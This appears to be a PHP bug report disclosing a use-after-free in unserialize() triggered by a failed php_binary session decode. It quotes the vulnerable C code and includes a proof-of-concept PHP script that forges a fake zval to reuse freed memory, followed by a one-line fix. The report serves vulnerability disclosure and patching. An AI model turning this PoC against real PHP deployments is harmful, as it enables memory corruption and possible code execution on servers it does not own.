Description:
------------
Use After Free in unserialize() with Unexpected Session Deserialization

```
PS_SERIALIZER_DECODE_FUNC(php_binary) /* {{{ */
{
	...
	PHP_VAR_UNSERIALIZE_INIT(var_hash);

	for (p = val; p < endptr; ) {
		zval **tmp;
		namelen = ((unsigned char)(*p)) & (~PS_BIN_UNDEF);

		if (namelen < 0 || namelen > PS_BIN_MAX || (p + namelen) >= endptr) {
			return FAILURE;
		}
```

The `PHP_VAR_UNSERIALIZE_DESTROY` will not be called when the deserialization fails.

```
#define PHP_VAR_UNSERIALIZE_DESTROY(var_hash_ptr) \
do { \
	/* fprintf(stderr, "UNSERIALIZE_DESTROY == lock: %u, level: %u\n", BG(serialize_lock), BG(unserialize).level); */ \
	if (BG(serialize_lock) || !BG(unserialize).level) { \
		var_destroy(&(var_hash_ptr)); \
		efree(var_hash_ptr); \
	} else { \
		if (!--BG(unserialize).level) { \
			var_destroy(&(var_hash_ptr)); \
			efree((var_hash_ptr)); \
			BG(unserialize).var_hash = NULL; \
		} \
	} \
} while (0)
```

So the `var_hash` will not be destroyed, this means that it is possible to call the php_var_unserialize() multiple times with the `var_hash`. This also means that it is possible to lead to use-after-free in the context of code. The exploitation way has been demonstrated many times before in some fixed and unfixed bugs.

PoC:
```
<?php

ini_set('session.serialize_handler', 'php_binary');
session_start();
$sess = "\x1xi:1;\x2y";
session_decode($sess);
$uns_1 = '{';
$out_1[] = unserialize($uns_1);
unset($out_1);
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
for ($i = 0; $i < 5; $i++) {
  $v[$i] = $fakezval.$i;
}
$uns_2 = 'R:2;';
$out_2 = unserialize($uns_2);
var_dump($out_2);

function ptr2str($ptr)
{
	$out = '';
	for ($i = 0; $i < 8; $i++) {
		$out .= chr($ptr & 0xff);
		$ptr >>= 8;
	}
	return $out;
}

?>
```

Fix:
```
if (namelen < 0 || namelen > PS_BIN_MAX || (p + namelen) >= endptr) {
+  PHP_VAR_UNSERIALIZE_DESTROY(var_hash);
  return FAILURE;
}
```